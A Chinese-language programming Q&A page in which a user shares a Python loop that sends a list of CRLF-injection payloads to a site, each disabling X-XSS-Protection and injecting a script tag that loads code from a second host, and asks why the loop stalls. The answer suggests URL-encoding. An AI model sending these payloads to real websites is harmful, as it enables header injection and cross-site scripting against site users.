请求未在Python3中发送

时间:2020-10-31 12:36:32

标签: python-3.x python-requests newline

我有一个包含要发送的某些请求的数组。基本上,我要发送的请求是网站+目录(在本例中为arrays元素)。例如:http://randomwebsite.com/%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2Fhttp://anotherwebsite.com%3E%0d%0a0%0d%0a/%2e%2e

我的代码:

import requests

site="http://randomwebsite.com"
tcp_server = "http://anotherwebsite.com"
list_of_requests = [
    "/%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%0d%0a0%0d%0a/%2e%2e",
    "/%0a0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3D" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%OdX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%23%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%23%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%23%OdX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%25%30%61X-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%25%30aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%250aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%25250aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%2e%2e%2f%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%2f%2e%2e%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%2F..%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%3f%Od%OaX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%3f%OdX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E",
    "/%u000aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%20src%3Dhttp%3A%2F%2F" + tcp_server + "%3E%3C%2Fscript%3E"]

for payload in list_of_requests:
    ...
    [some code here]
    ...
    if str(payload) in requests.get(site + payload).text:
        print("Request valid")
    else:
        print("Request not valid")

我的输出是这样:

Request not valid
Request not valid
Request not valid

然后程序在发送这3个请求后停止,并且一直保持不变。我不明白为什么我不继续发送请求。

1 个答案:

答案 0 :(得分:1)

那是因为URL编码不正确。

尝试使用urllib.parse对其进行编码,如下所示:

import requests
import urllib.parse

site="http://randomwebsite.com"
tcp_server = urllib.parse.quote("anotherwebsite.com")

... <rest of your code>
相关问题
最新问题